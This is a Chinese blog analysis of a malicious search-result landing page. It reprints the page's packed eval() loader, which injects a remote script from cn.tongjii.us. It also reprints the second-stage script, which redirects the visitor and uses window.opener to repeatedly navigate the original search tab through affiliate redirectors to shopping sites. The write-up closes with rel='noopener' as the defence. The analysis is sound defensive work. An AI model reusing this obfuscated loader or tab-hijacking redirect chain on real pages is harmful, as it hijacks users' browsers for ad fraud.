分析一个流氓的思路~

今天黑五看中了一个汉密尔顿,想百度搜下有没有相关的评析.
https://www.baidu.com/s?ie=UTF-8&wd=H18516731
然后发现了搜索排名第一的家伙,没想到竟然是一个流氓链接~

点击后发现链接经过了好几个跳转,这倒不算啥,但突然我发现我的百度搜索页也经过了好几次跳转!!!
因为经过360搜索的那次风波,百度所有搜索页的链接都是加密过的,不是直接打开的用户链接.没想到这种情况下流氓竟然还能控制父级窗口(也就是打开着陆页的那个百度搜索结果页).所以我就分析了下他的实现机制,在他的着陆页面我看到了下面的源代码.

<!-- External script include from js.users.51.la. According to the author's own test, this tag is not what drives the redirects. -->
<script language="javascript" type="text/javascript" src="http://js.users.51.la/17745757.js"></script>
<!-- Packed loader, two layers deep. The outer eval() runs a base-42 word-substitution unpacker over the quoted string,
     and the unpacked text is itself a second eval() of the same unpacker in base 16.
     The dictionary on the last line holds createElement, getElementsByTagName, parentNode, insertBefore, src
     and the host pieces cn, tongjii, us, js. Unpacked, it is a script-injection stub pointing at //cn.tongjii.us/cn.js. -->
<script>
eval(function(d,e,a,c,b,f){b=function(a){return(a<e?"":b(parseInt(a/e)))+(35<(a%=e)?String.fromCharCode(a+29):a.toString(36))};if(!"".replace(/^/,String)){for(;a--;)f[b(a)]=c[a]||b(a);c=[function(a){return f[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(new RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}('n(h(d,f,a,c,b,e){b=h(a){i a.p(f)};q(!"".j(/^/,o)){l(;a--;)e[b(a)]=c[a]||b(a);c=[h(a){i e[a]}];b=h(){i"\\\\w+"};a=1}l(;a--;)c[a]&&(d=d.j(r m("\\\\b"+b(a)+"\\\\b","g"),c[a]));i d}(\'(7(){4 a=1.6("2");a.c="//3.5.8/3.9";4 b=1.d("2")[0];b.e.f(a,b)})();\',k,k," s t u v x y h z A   B C D E".F(" "),0,{}));',
42,42,"                 function return replace 16 for RegExp eval String toString if new document script cn var  tongjii createElement us js src getElementsByTagName parentNode insertBefore split".split(" "),0,{}));
</script> 

本以为实现是第一个js文件,后来经过测试发现和第一个script标签没关系,所以实现代码是第二个script标签,解密了下代码如下.

// Decoded form of the packed <script> on the landing page: a stub whose only job is to pull in a second-stage script.
(function() {
	// New <script> element with a protocol-relative source, so it is fetched over whatever scheme the page uses.
	var a = document.createElement("script");
	a.src = "//cn.tongjii.us/cn.js";
	// Insert it before the first <script> in the document; the browser then fetches and runs cn.js in this page's context.
	var b = document.getElementsByTagName("script")[0];
	b.parentNode.insertBefore(a, b)
})();

看来这个载入的js就是源头了,打开这个js发现下面代码.

// Second-stage script (cn.js). Summary of what the visible code does:
//   1. runs once per page (global flag sbj_new_loading);
//   2. removes an element with id 'tongjiTool' if one exists;
//   3. on anything but IE6, loads jQuery from a third-party host if the page has none;
//   4. once jQuery has loaded, navigates the current window and, if window.opener exists,
//      repeatedly navigates the window that opened this page (e.g. the search results tab).
// Hosts written as www.xxx / www.xxxx / www.xxxxx appear to have been redacted by the write-up's author.
// NOTE(review): the opener-navigation in step 4 only works when the linking page leaves window.opener set;
// rel="noopener" on target="_blank" links makes window.opener null in the opened page.
if(typeof(sbj_new_loading)=="undefined"||sbj_new_loading==null||sbj_new_loading==false){
	// Implicit global used as a run-once guard.
	sbj_new_loading = true;
	
	// Blank the src of the element with id 'tongjiTool' and detach it from <body>, if present.
	var seed = document.getElementById('tongjiTool');
	if(seed!=null&&seed.src!=null){	
		seed.src = '';
		document.body.removeChild(seed);
	}
	// User-agent sniff: the rest of the script is skipped entirely on IE6.
	var _ua = navigator.userAgent.toLowerCase();
	var isIE6 = /msie 6/.test(_ua);
	
	if(!isIE6){
		// Two implicit globals; neither is read again in the code shown here.
		scope = {
				$pageid : 'tongjiTool'
		};
		$_GLOBAL = {};
		// Script element for a jQuery copy hosted on cdn.lib.shaibaoj.com.
		var js = document.createElement('script');
		js.src = 'http://cdn.lib.shaibaoj.com/js/lib/jquery.js?5';
		js.setAttribute('charset','utf-8');
		// The element is appended, and the handler below attached, only when the page has no jQuery yet;
		// when jQuery is already defined none of the redirect logic in this block runs.
		if (typeof jQuery == 'undefined') { 
			(document.getElementsByTagName("head")[0] || document.body).appendChild(js);
			js.onload = js.onreadystatechange = function () {	
				// readyState guard: ignore intermediate onreadystatechange events until the script is loaded/complete.
				if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
					return;
				}
				//jQuery.noConflict(); 
				
				// Request to cookie.jsp on qun12.shellgl.in; the "jsoncallback=?" placeholder makes jQuery issue it as JSONP.
				// The response (datalog) is not used. When it arrives, the current window is sent to a redirect.jsp URL.
				jQuery.getJSON("http://qun12.shellgl.in/cookie.jsp?name=ad_tiao&times=1&save=1&jsoncallback=?", {},function(datalog){
					// The first value is overwritten on the next line, so only the jd.com target is used.
					var tiao_url="http://www.xxxx.com/hd/2015/1111/index.html";
					tiao_url="http://www.xxxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jd.com";
					window.location.href = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
				});
				

				
				// window.opener is the window that opened this page. Assigning to its location navigates that window,
				// which is how the search results tab in the background gets redirected.
				if (parent.window.opener) {
					// Immediate navigation of the opener (target: jd.com via two redirectors).
					var tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jd.com";
					parent.window.opener.location = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					
					// Seven further navigations of the opener, scheduled one second apart (1s .. 7s),
					// each with a different shopping site as the final target:
					// mogujie, suning, vip, gome, yhd, nuomi, jumei.
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.mogujie.com";
						parent.window.opener.location = "http://www.xxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 1000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.suning.com";
						parent.window.opener.location = "http://www.xxxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 2000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.vip.com";
						parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 3000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.gome.com.cn";
						parent.window.opener.location = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 4000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.yhd.com";
						parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 5000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.nuomi.com";
						parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 6000);
					setTimeout(function(){										
						tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jumei.com";
						parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
					}, 7000);
				}
			};
		}
	};
}
//
//if (typeof(to_url) != "undefined" && to_url != null && to_url != '' && to_url != 'null') {
//	var referer = document.referrer;
//	window.location.href = "http://www.qqgou.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&toUrl="+encodeURIComponent(to_url)+"&keyName="+keyStr;
//} else {
//	if (typeof(keyStr) != "undefined" && keyStr != null && keyStr != '' && keyStr != 'null') {
//		if(typeof(goods_url)!="undefined"&&goods_url!=null&&goods_url!=''&&goods_url!='null'){
//			/*
//			var referer = document.referrer;
//			var bot = ['.haosou.com','.sm.cn','.sina.com.cn','.baidu.com', '.so.com','.soso.com', '.sogou.com','.google.com.hk','so.360.cn', 'cn.bing.com',  'youdao.com','wo.com.cn'];
//			for (var i in bot) {
//				if(referer!=null&&referer.indexOf(bot[i]) != -1) {					
//					window.location.href = "http://www.cjjzmx.com/cn_goods_redirect.jsp?referer=&target="+goods_url+"&keyName="+keyStr;
//					return;
//				}
//			}	
//			window.location.href = "http://www.xxxx.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&keyName="+keyStr;*/
//			window.location.href = "http://www.xxxx.in/cn_goods_redirect.jsp?referer=&target="+goods_url+"&keyName="+keyStr;
//		}else{			
//			var referer = document.referrer;
//			window.location.href = "http://www.xxx.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&keyName="+keyStr;
//		}
//	}else{
//		var referer = document.referrer;
//		window.location.href = "http://www.xxx.in/pd.jsp?referer=" + encodeURIComponent(referer);
//	}
//}

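看来是通过parent.window.opener拿到了百度搜索页面的窗口引用,就是没想到这个parent.window.opener在跳转之后还能保持,然后这哥们给了七次链接跳转,看样子应该是刷广告的主了~
之所以跳转之后还能保持,是因为搜索结果是在新窗口里打开的,新页面的window.opener指向的是打开它的那个窗口本身,而不是某个URL,所以中间经过多少次跳转、链接是否加密都不影响;跨域时虽然读不到opener里的内容,但可以给opener.location赋值让它跳转.站点这边的防范办法是给target="_blank"的外链加上rel="noopener",这样新页面里的window.opener就是null(较新的浏览器对target="_blank"已经默认按noopener处理).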
不过这思路确实很不错啊!
